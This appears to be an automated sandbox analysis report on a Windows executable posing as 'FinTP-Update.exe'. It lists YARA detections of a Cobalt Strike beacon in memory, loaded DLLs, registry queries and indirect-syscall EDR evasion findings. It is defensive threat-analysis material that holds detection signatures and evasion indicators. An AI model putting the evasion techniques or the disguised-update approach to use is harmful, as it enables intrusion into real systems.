          Source: 00000000.00000003.2403086446.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.3210341525.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.3299179602.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.3277090416.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.2919850497.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.3321307037.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.3188050658.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.3299071408.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.2897678631.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.2221740996.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_663fc95d os = windows, severity = x86, description = Identifies CobaltStrike via unidentified function code, creation_date = 2021-04-01, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48, id = 663fc95d-2472-4d52-ad75-c5d86cfc885f, last_modified = 2021-12-17
          Source: 00000000.00000003.2288264868.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.2651458102.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.2919720968.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000002.3357924421.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.2674172378.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.2221645510.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.2425276670.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.2380403205.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.2357611219.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.2170181010.0000017F36BBF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.3276936352.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.2380566087.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: 00000000.00000003.2266186373.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: classification engineClassification label: mal100.troj.evad.winEXE@2/1@3/1
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1996:120:WilError_03
          Source: FinTP-Update.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\FinTP-Update.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\FinTP-Update.exe "C:\Users\user\Desktop\FinTP-Update.exe"
          Source: C:\Users\user\Desktop\FinTP-Update.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\FinTP-Update.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\FinTP-Update.exeSection loaded: msvcp140.dllJump to behavior
          Source: C:\Users\user\Desktop\FinTP-Update.exeSection loaded: vcruntime140.dllJump to behavior
          Source: C:\Users\user\Desktop\FinTP-Update.exeSection loaded: vcruntime140.dllJump to behavior
          Source: C:\Users\user\Desktop\FinTP-Update.exeSection loaded: vcruntime140_1.dllJump to behavior
          Source: C:\Users\user\Desktop\FinTP-Update.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\FinTP-Update.exeSection loaded: napinsp.dllJump to behavior
          Source: C:\Users\user\Desktop\FinTP-Update.exeSection loaded: pnrpnsp.dllJump to behavior
          Source: C:\Users\user\Desktop\FinTP-Update.exeSection loaded: wshbth.dllJump to behavior
          Source: C:\Users\user\Desktop\FinTP-Update.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Users\user\Desktop\FinTP-Update.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\FinTP-Update.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\FinTP-Update.exeSection loaded: winrnr.dllJump to behavior
          Source: C:\Users\user\Desktop\FinTP-Update.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\FinTP-Update.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\FinTP-Update.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\FinTP-Update.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\FinTP-Update.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\FinTP-Update.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\FinTP-Update.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\FinTP-Update.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\FinTP-Update.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\FinTP-Update.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\FinTP-Update.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\FinTP-Update.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\FinTP-Update.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\FinTP-Update.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\FinTP-Update.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\FinTP-Update.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\FinTP-Update.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\FinTP-Update.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\FinTP-Update.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\FinTP-Update.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\FinTP-Update.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\FinTP-Update.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\FinTP-Update.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\FinTP-Update.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\FinTP-Update.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\FinTP-Update.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\FinTP-Update.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
          Source: FinTP-Update.exeStatic PE information: Image base 0x140000000 > 0x60000000
          Source: FinTP-Update.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: FinTP-Update.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: FinTP-Update.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: FinTP-Update.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: FinTP-Update.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: FinTP-Update.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: FinTP-Update.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: FinTP-Update.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: C:\Users\dan\source\repos\ConsoleApplication6\x64\Release\ConsoleApplication6.pdb$$ source: FinTP-Update.exe
          Source: Binary string: C:\Users\dan\source\repos\ConsoleApplication6\x64\Release\ConsoleApplication6.pdb source: FinTP-Update.exe
          Source: FinTP-Update.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: FinTP-Update.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: FinTP-Update.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: FinTP-Update.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: FinTP-Update.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Users\user\Desktop\FinTP-Update.exeCode function: 0_3_0000017F36AE28CB push esp; retf 0_3_0000017F36AE28D3
          Source: C:\Users\user\Desktop\FinTP-Update.exeCode function: 0_2_0000017F38AC339D push edi; iretd 0_2_0000017F38AC339E
          Source: C:\Users\user\Desktop\FinTP-Update.exeCode function: 0_2_0000017F38AC4D98 push ebp; iretd 0_2_0000017F38AC4D99
          Source: C:\Users\user\Desktop\FinTP-Update.exeCode function: 0_2_0000017F38AC375E push cs; retf 0_2_0000017F38AC375F
          Source: C:\Users\user\Desktop\FinTP-Update.exeCode function: 0_2_0000017F38ACCF36 push es; ret 0_2_0000017F38ACCF37
          Source: C:\Users\user\Desktop\FinTP-Update.exeCode function: 0_2_0000017F38AED80C push ebp; iretd 0_2_0000017F38AED811
          Source: C:\Users\user\Desktop\FinTP-Update.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
          Source: C:\Users\user\Desktop\FinTP-Update.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
          Source: C:\Users\user\Desktop\FinTP-Update.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
          Source: FinTP-Update.exe, 00000000.00000003.2764950621.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2313200724.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2266186373.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2720385206.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3210222424.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2288264868.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2402975356.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2335299936.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000002.3357924421.0000017F36B54000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2673905234.0000017F36B97000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: C:\Users\user\Desktop\FinTP-Update.exeCode function: 0_2_00007FF7193C28D0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7193C28D0
          Source: C:\Users\user\Desktop\FinTP-Update.exeCode function: 0_2_00007FF7193C2A78 SetUnhandledExceptionFilter,0_2_00007FF7193C2A78
          Source: C:\Users\user\Desktop\FinTP-Update.exeCode function: 0_2_00007FF7193C28D0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7193C28D0
          Source: C:\Users\user\Desktop\FinTP-Update.exeCode function: 0_2_00007FF7193C21D4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF7193C21D4

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Found direct / indirect Syscall (likely to bypass EDR)
          Source: C:\Users\user\Desktop\FinTP-Update.exeNtProtectVirtualMemory: Indirect: 0x17F38ADA51BJump to behavior
          Source: C:\Users\user\Desktop\FinTP-Update.exeNtAllocateVirtualMemory: Indirect: 0x17F38ADA154Jump to behavior
          Source: C:\Users\user\Desktop\FinTP-Update.exeCode function: 0_2_00007FF7193C27B0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF7193C27B0
          Source: C:\Users\user\Desktop\FinTP-Update.exeCode function: 0_2_0000017F38AD17A8 GetUserNameA,strrchr,_snprintf,0_2_0000017F38AD17A8
          Source: C:\Users\user\Desktop\FinTP-Update.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Remote Access Functionality

          barindex
          Yara detected CobaltStrike
          Source: Yara matchFile source: 00000000.00000003.2425134169.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.2313200724.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.2313315862.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.2651300690.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.2764950621.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.2491328068.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.2491486119.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.3344304389.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.2897558123.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.2199556611.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.2199657950.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.3343869125.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.2673905234.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.2243779777.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.2720594519.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.3321457161.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.3232356008.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.3254690266.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.2335391870.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.2288382681.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.2626008832.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.2626162702.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.2765296970.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.3254891308.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.2243689631.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.2357499921.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.2720385206.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.3232473425.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.2402975356.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.3210222424.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.2335299936.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
